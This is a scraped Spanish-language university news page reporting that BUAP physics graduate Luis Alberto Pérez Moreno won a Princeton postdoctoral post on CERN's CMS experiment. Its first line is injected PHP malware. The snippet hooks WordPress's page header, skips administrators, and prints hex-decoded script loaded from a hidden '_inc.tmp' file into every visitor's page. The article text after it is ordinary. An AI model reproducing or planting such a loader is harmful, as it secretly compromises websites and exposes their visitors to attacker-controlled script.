if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } La Opinión Universitaria La Opinión Universitaria
Menu

Egresado de la BUAP obtiene plaza en la Universidad de Princeton

 

* El doctor Luis Alberto Pérez Moreno realizará tareas asignadas para el experimento CMS

 

Gracias a su disciplina, trabajo y desempeño, el doctor Luis Alberto Pérez, doctor en Física Aplicada por la BUAP, iniciará su estancia posdoctoral en la Universidad de Princeton, una de las más prestigiadas del mundo, a partir de enero de 2020, con una duración inicial de dos años y con posibilidad de extenderse. En esa institución estadounidense realizará tareas asignadas en el Compact Muon Solenoid (CMS), específicamente en el sistema de disparo.

 

CMS es uno de los dos grandes experimentos del CERN ( el otro es Atlas) que descubrieron el Boson de Higgs y ahora se encargan de conocer en detalle sus propiedades físicas.

 

“Mis profesores universitarios son los responsables de impulsar mi gusto por la ciencia, por el trabajo de la física experimental, son como parte de mi familia, porque mis logros no son personales, son gracias al apoyo que recibí de ellos y de la BUAP”, declara orgulloso el ahora doctor en Física Aplicada por la BUAP, Luis Alberto Pérez Moreno, quien ha sido seleccionado, tras un riguroso proceso, para ocupar una plaza posdoctoral en la Universidad de Princeton.

 

Egresado de la Facultad de Ciencias de la Electrónica, el doctor Pérez Moreno cursó su maestría y doctorado en Física Aplicada en la Facultad de Ciencias Físico Matemáticas de la BUAP, donde colaboró en proyectos como el detector ACORDE y el experimento ALICE del Gran Colisionador de Hadrones (LHC, por sus siglas en inglés), del Centro Europeo de Investigaciones Nucleares (CERN, por sus siglas en francés).

 

En Princeton realizará tareas asignadas en el Compact Muon Solenoid (CMS). Actualmente el CMS es un experimento que se encarga de conocer en detalle las propiedades físicas del Bosson de Higgs ―una partícula subatómica que resulta esencial para entender el mundo que nos rodea. En el CERN hay dos experimentos diseñados para la búsqueda de esta partícula, el CMS y el ATLAS, ambos proyectos del LHC, un gran detector de 21 metros de largo, 15 de alto y 12 mil 500 toneladas de peso, ubicado en la frontera franco-suiza, cerca de Ginebra.

 

 

Tweets recientes